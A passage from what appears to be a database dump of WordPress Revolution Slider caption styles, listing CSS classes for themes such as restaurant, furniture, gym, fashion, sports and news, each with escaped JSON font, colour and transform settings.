],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"font-size\":\"20px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(53,'.tp-caption.Restaurant-Price','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(54,'.tp-caption.Restaurant-Menuitem','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"500\",\"easing\":\"power2.inOut\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"10px\",\"30px\",\"10px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(55,'.tp-caption.Furniture-LogoText','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"color\":\"#e6cfa3\",\"color-transparency\":\"1\",\"font-size\":\"160px\",\"line-height\":\"150px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(56,'.tp-caption.Furniture-Plus','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0.5\",\"easing\":\"none\"}','{\"idle\":{\"text-shadow\":\"none\",\"box-shadow\":\"rgba(0,0,0,0.1) 0 1px 3px\"},\"hover\":\"\"}','{\"color\":\"#e6cfa3\",\"color-transparency\":\"1\",\"font-size\":\"20\",\"line-height\":\"20px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":[\"6px\",\"7px\",\"4px\",\"7px\"],\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(57,'.tp-caption.Furniture-Title','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"text-shadow\":\"none\",\"letter-spacing\":\"3px\"},\"hover\":\"\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"700\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(58,'.tp-caption.Furniture-Subtitle','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"20px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(59,'.tp-caption.Gym-Display','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"80px\",\"line-height\":\"70px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(60,'.tp-caption.Gym-Subline','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"5px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(61,'.tp-caption.Gym-SmallText','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"22\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(62,'.tp-caption.Fashion-SmallText','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"12px\",\"line-height\":\"20px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(63,'.tp-caption.Fashion-BigDisplay','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(64,'.tp-caption.Fashion-TextBlock','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"40px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(65,'.tp-caption.Sports-Display','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"13px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"130px\",\"line-height\":\"130px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(66,'.tp-caption.Sports-DisplayFat','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":[\"\"],\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"130px\",\"line-height\":\"130px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(67,'.tp-caption.Sports-Subline','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"4px\"},\"hover\":\"\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"32px\",\"line-height\":\"32px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(68,'.tp-caption.Instagram-Caption','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(69,'.tp-caption.News-Title','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"70px\",\"line-height\":\"60px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Roboto Slab\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(70,'.tp-caption.News-Subtitle','{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"0.65\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"0px\",\"border-radius\":[\"0\",\"0\",\"0px\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"300\",\"easing\":\"power3.inOut\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"24px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Roboto Slab\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(71,'.tp-caption.Photography-Display','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"5px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"80px\",\"line-height\":\"70px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\